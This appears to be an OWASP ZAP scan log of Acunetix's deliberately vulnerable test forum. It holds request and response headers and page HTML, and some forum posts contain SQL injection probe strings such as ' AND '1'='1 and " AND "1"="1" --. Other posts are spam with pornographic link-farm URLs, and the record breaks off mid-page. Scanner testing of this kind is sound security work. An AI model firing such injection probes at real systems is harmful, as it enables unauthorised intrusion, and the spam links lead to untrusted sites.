- <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td 